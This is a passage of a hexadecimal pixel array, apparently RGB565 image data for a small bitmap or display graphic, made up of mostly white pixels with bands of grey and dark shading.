0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7de, 0xffff, 0x73ae, 0xb5b6, 0xb5b6, 0xc618, 0xe73c, 0xe75d, 0xe73c, 0xd69a, 0xad55, 0xb5b7, 0x7bf0, 0xbdf8, 0xffff, 0xffff, 0xffff, 0xef5d, 0xce59, 0x9492, 0xa514, 0xad55, 0x94b2, 0xad75, 0x9cf3, 0x9cf3, 0xb596, 0x94b2, 0xad55, 0x9cf3, 0xa514, 0x9cd3, 0x9cf3, 0x9cd3, 0x9cd3, 0x9cf3, 0x9cf3, 0x94b3, 0x94b3, 0xad75, 0x94b2, 0xb5b6, 0x9492, 0xb596, 0x9492, 0xad75, 0xad55, 0x9cf4, 0x94b3, 0xad76, 0xa534, 0x8c72, 0xce59, 0xce59, 0x9cd3, 0xa514, 0x9cf4, 0xa514, 0xa535, 0x9cd3, 0xbdd7, 0xe71c, 0xf7be, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xef7d, 0x73ae, 0xdefb, 0xbdf7, 0x6b6d, 0xdedb, 0xffff, 0xf7be, 0x94b2, 0x8430, 0xbdd7, 0xef7d, 0xb596, 0xef5d, 0xc618, 0xe71c, 0x8c51, 0xffff, 0xce79, 0x8410, 0x9492, 0xdedb, 0xf7be, 0xce59, 0xb596, 0xd69a, 0xbdf7, 0xad55, 0xd6ba, 0xdefb, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xef5d, 0xad55, 0xa514, 0xad55, 0xb596, 0xb596, 0xa534, 0xad75, 0xb5b6, 0xa534, 0xd69a, 0xffff, 0xffdf, 0xffff, 0xef5d, 0x9cf3, 0xa514, 0x9cd3, 0x9cf3, 0x9cf4, 0x9cd3, 0x9cd3, 0x9cd3, 0x9cf4, 0x9cd3, 0x9cd3, 0x9cf3, 0x9cd3, 0x94b3, 0x9cd3, 0x94b3, 0x9cd3, 0x9cd3, 0x9cd3, 0x9cd3, 0x9cf3, 0x9cd3, 0x9cf4, 0x9cf3, 0x9cd3, 0x9cf3, 0x9cd3, 0x9cf3, 0x9cd3, 0x9cf3, 0x9cf3, 0x9cd3, 0x94b3, 0x9cd3, 0x9cf4, 0x9cd3, 0xa514, 0x9cd3, 0x9cd3, 0x9cf3, 0x9cf4, 0x9cd3, 0x94b3, 0xa514, 0xad55, 0xb596, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xc638, 0x73ae, 0xb596, 0xbdf7, 0xb5b6, 0xd69a, 0x630c, 0xf79e, 0xce59, 0xdefb, 0xef5d, 0xbdf7, 0xce59, 0xce79, 0xce79, 0xad75, 0x8c71, 0xc618, 0xb5b6, 0xc638, 0xe71c, 0xb596, 0xf7be, 0x9492, 0xdefb, 0xbdf7, 0x9cd3, 0x9cf3, 0x9cd3, 0xef7d, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffbf, 0xffff, 0x3166, 0x10a2, 0x2965, 0x31a6, 0x39e7, 0x31a6, 0x31a7, 0x39c7, 0x3186, 0x3186, 0x39e7, 0x31a6, 0x31a7, 0x31a7, 0x31a7, 0x39c7, 0x31a7, 0x39c7, 0x31a7, 0x39c7, 0x39c7, 0x39c7, 0x31a7, 0x39c7, 0x39c7, 0x39c7, 0x31a7, 0x31a7, 0x31a7, 0x31a6, 0x39c7, 0x39c7, 0x39e7, 0x31a7, 0x31a7, 0x31a7, 0x31a6, 0x31a7, 0x31a7, 0x39c7, 0x31a6, 0x39c7, 0x39c7, 0x2965, 0x0020, 0xa514, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xc618, 0xbdf7, 0xef5d, 0xbdf7, 0xb5b6, 0x9cd3, 0xce79, 0xf79e, 0x73ae, 0xb596, 0x8c51, 0x9492, 0xffff, 0xbdf7, 0xc638, 0xef5d, 0xce79, 0xe73c, 0xdedb, 0xd69a, 0xbdf7, 0xffff, 0xffdf, 0xad55, 0x8430, 0xbdf7, 0xce79, 0xce59, 0xd69a, 0xc618, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xa534, 0x2124, 0x31a6, 0x4208, 0x4a49, 0x4a49, 0x4228, 0x4208, 0x4229, 0x4a49, 0x4228, 0x4228, 0x4a49, 0x4229, 0x4229, 0x4229, 0x4229, 0x4229, 0x4208, 0x4229, 0x4228, 0x4208, 0x4a49, 0x4a49, 0x4228, 0x4228, 0x4229, 0x4a49, 0x4229, 0x4229, 0x4228, 0x4228, 0x4228, 0x4a49, 0x4a49, 0x4a49, 0x4229, 0x4208, 0x4a69, 0x4229, 0x4208, 0x4a49, 0x4208, 0x2945, 0x630c, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7be, 0xffff, 0xa534, 0xe73c, 0xad55, 0x9cf3, 0xd69a, 0xffff, 0xffff, 0xdefb, 0xf7be, 0xbdd7, 0xbdd7, 0xc638, 0x8430, 0xf79e, 0xbdd7, 0xb596, 0xffdf, 0xd69a, 0xb596, 0x9cd3, 0xe73c, 0xef7d, 0xd69a, 0xef5d, 0xad75, 0xdedb, 0xce79, 0x8c71, 0xe73c, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xf7be, 0xf79d, 0xf79e, 0xef7d, 0xef7d, 0xf79e, 0xef7e, 0xf79e, 0xf79e, 0xef7e, 0xf79e, 0xf79e, 0xf79e, 0xf79e, 0xf79e, 0xf79e, 0xf79e, 0xf79e, 0xf79e, 0xf79e, 0xf79e, 0xf79e, 0xf79e, 0xf79e, 0xef7e, 0xf79e, 0xef7e, 0xf79e, 0xf79e, 0xf7be, 0xef7e, 0xf79e, 0xef7e, 0xf79e, 0xf79e, 0xef7e, 0xf79e, 0xef7d, 0xef7e, 0xef7e, 0xf79e, 0xf79e, 0xf7bf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7be, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xef7d, 0xffdf, 0xdefb, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xf79e, 0xffff, 0xffdf, 0xf7be, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7be, 0xffff, 0xffff, 0xffdf, 0xf79e, 0xffff, 0xffdf, 0xef7d, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffde, 0xf7be, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf79e, 0xf79e, 0xffff, 0xffdf, 0xf7be, 0xffff, 0xf7be, 0xef7d, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 